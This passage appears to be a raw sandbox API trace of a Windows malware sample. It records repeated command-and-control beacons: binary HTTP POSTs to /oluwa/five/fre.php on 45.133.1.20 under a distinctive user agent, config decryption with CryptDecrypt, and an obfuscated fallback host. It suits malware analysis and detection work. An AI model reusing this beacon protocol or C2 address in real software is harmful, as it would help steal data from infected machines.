(HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0156.230] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9a0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0156.230] GetProcessHeap () returned 0x6a0000 [0156.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0156.230] socket (af=2, type=1, protocol=6) returned 0x268 [0156.230] connect (s=0x268, name=0x6be9a0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0156.302] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9a0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0156.302] GetProcessHeap () returned 0x6a0000 [0156.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bc2a8 [0156.302] GetProcessHeap () returned 0x6a0000 [0156.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0156.303] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.304] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0156.304] GetProcessHeap () returned 0x6a0000 [0156.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc330 [0156.304] GetProcessHeap () returned 0x6a0000 [0156.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.305] GetProcessHeap () returned 0x6a0000 [0156.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0156.305] GetProcessHeap () returned 0x6a0000 [0156.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0156.306] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.307] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0156.307] GetProcessHeap () returned 0x6a0000 [0156.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc3f0 [0156.307] GetProcessHeap () returned 0x6a0000 [0156.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.309] send (s=0x268, buf=0x6bc3f0*, len=242, flags=0) returned 242 [0156.310] send (s=0x268, buf=0x6bb998*, len=159, flags=0) returned 159 [0156.310] GetProcessHeap () returned 0x6a0000 [0156.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0156.310] recv (in: s=0x268, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0156.408] GetProcessHeap () returned 0x6a0000 [0156.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc3f0 | out: hHeap=0x6a0000) returned 1 [0156.408] GetProcessHeap () returned 0x6a0000 [0156.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0156.409] GetProcessHeap () returned 0x6a0000 [0156.409] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc330 | out: hHeap=0x6a0000) returned 1 [0156.409] GetProcessHeap () returned 0x6a0000 [0156.410] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc2a8 | out: hHeap=0x6a0000) returned 1 [0156.410] closesocket (s=0x268) returned 0 [0156.411] GetProcessHeap () returned 0x6a0000 [0156.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0156.411] GetProcessHeap () returned 0x6a0000 [0156.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.411] GetProcessHeap () returned 0x6a0000 [0156.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0156.412] GetProcessHeap () returned 0x6a0000 [0156.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0156.413] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1378) returned 0x268 [0156.415] Sleep (dwMilliseconds=0xea60) [0156.417] GetProcessHeap () returned 0x6a0000 [0156.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0156.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.418] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0156.435] GetProcessHeap () returned 0x6a0000 [0156.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0156.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.436] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0156.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.437] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.438] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.438] GetProcessHeap () returned 0x6a0000 [0156.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0156.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.442] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0156.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.443] CryptDestroyKey (hKey=0x6ad020) returned 1 [0156.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.445] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0156.445] GetProcessHeap () returned 0x6a0000 [0156.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0156.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.454] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0156.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.456] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0156.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.458] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0156.458] GetProcessHeap () returned 0x6a0000 [0156.458] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0156.458] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0156.458] GetProcessHeap () returned 0x6a0000 [0156.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0156.459] GetProcessHeap () returned 0x6a0000 [0156.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.459] GetProcessHeap () returned 0x6a0000 [0156.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0156.459] GetProcessHeap () returned 0x6a0000 [0156.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0156.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.461] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.469] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0156.480] GetProcessHeap () returned 0x6a0000 [0156.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0156.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.481] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0156.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.485] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.486] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.486] GetProcessHeap () returned 0x6a0000 [0156.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0156.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.488] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0156.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.489] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0156.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.491] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0156.491] GetProcessHeap () returned 0x6a0000 [0156.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.491] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.492] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0156.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.498] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0156.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.499] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0156.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.500] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0156.500] GetProcessHeap () returned 0x6a0000 [0156.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0156.500] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0156.500] GetProcessHeap () returned 0x6a0000 [0156.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0156.501] socket (af=2, type=1, protocol=6) returned 0x26c [0156.501] connect (s=0x26c, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0156.530] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0156.530] GetProcessHeap () returned 0x6a0000 [0156.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bc3b8 [0156.530] GetProcessHeap () returned 0x6a0000 [0156.530] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0156.531] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.532] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0156.532] GetProcessHeap () returned 0x6a0000 [0156.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc440 [0156.532] GetProcessHeap () returned 0x6a0000 [0156.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.533] GetProcessHeap () returned 0x6a0000 [0156.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0156.533] GetProcessHeap () returned 0x6a0000 [0156.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0156.534] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0156.535] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0156.535] GetProcessHeap () returned 0x6a0000 [0156.535] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc500 [0156.535] GetProcessHeap () returned 0x6a0000 [0156.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0156.536] send (s=0x26c, buf=0x6bc500*, len=242, flags=0) returned 242 [0156.536] send (s=0x26c, buf=0x6bb998*, len=159, flags=0) returned 159 [0156.536] GetProcessHeap () returned 0x6a0000 [0156.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0156.537] recv (in: s=0x26c, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0156.620] GetProcessHeap () returned 0x6a0000 [0156.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc500 | out: hHeap=0x6a0000) returned 1 [0156.621] GetProcessHeap () returned 0x6a0000 [0156.621] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0156.621] GetProcessHeap () returned 0x6a0000 [0156.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc440 | out: hHeap=0x6a0000) returned 1 [0156.622] GetProcessHeap () returned 0x6a0000 [0156.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc3b8 | out: hHeap=0x6a0000) returned 1 [0156.622] closesocket (s=0x26c) returned 0 [0156.623] GetProcessHeap () returned 0x6a0000 [0156.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0156.623] GetProcessHeap () returned 0x6a0000 [0156.623] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.624] GetProcessHeap () returned 0x6a0000 [0156.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0156.624] GetProcessHeap () returned 0x6a0000 [0156.624] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0156.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfd0) returned 0x26c [0156.627] Sleep (dwMilliseconds=0xea60) [0156.628] GetProcessHeap () returned 0x6a0000 [0156.628] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0156.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.630] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.639] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0156.650] GetProcessHeap () returned 0x6a0000 [0156.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0156.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.652] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0156.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.654] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.655] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.655] GetProcessHeap () returned 0x6a0000 [0156.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0156.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.657] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0156.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.658] CryptDestroyKey (hKey=0x6ad020) returned 1 [0156.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.661] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0156.661] GetProcessHeap () returned 0x6a0000 [0156.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.663] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.663] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0156.669] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.669] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0156.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.671] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0156.671] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.672] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0156.672] GetProcessHeap () returned 0x6a0000 [0156.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0156.672] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0156.672] GetProcessHeap () returned 0x6a0000 [0156.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0156.673] GetProcessHeap () returned 0x6a0000 [0156.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0156.673] GetProcessHeap () returned 0x6a0000 [0156.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0156.674] GetProcessHeap () returned 0x6a0000 [0156.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0156.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0156.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.682] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0156.689] GetProcessHeap () returned 0x6a0000 [0156.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0156.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.690] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0156.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.691] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0156.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.694] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0156.694] GetProcessHeap () returned 0x6a0000 [0156.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0156.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.695] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0156.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.696] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0156.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0156.697] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0156.697] GetProcessHeap () returned 0x6a0000 [0156.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0156.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.698] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0156.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.699] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0156.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.700] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0156.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.701] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0156.701] GetProcessHeap () returned 0x6a0000 [0156.701] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0156.702] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7a8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0156.702] GetProcessHeap () returned 0x6a0000 [0156.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0156.702] socket (af=2, type=1, protocol=6) returned 0x270 [0156.702] connect (s=0x270, name=0x6be7a8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), 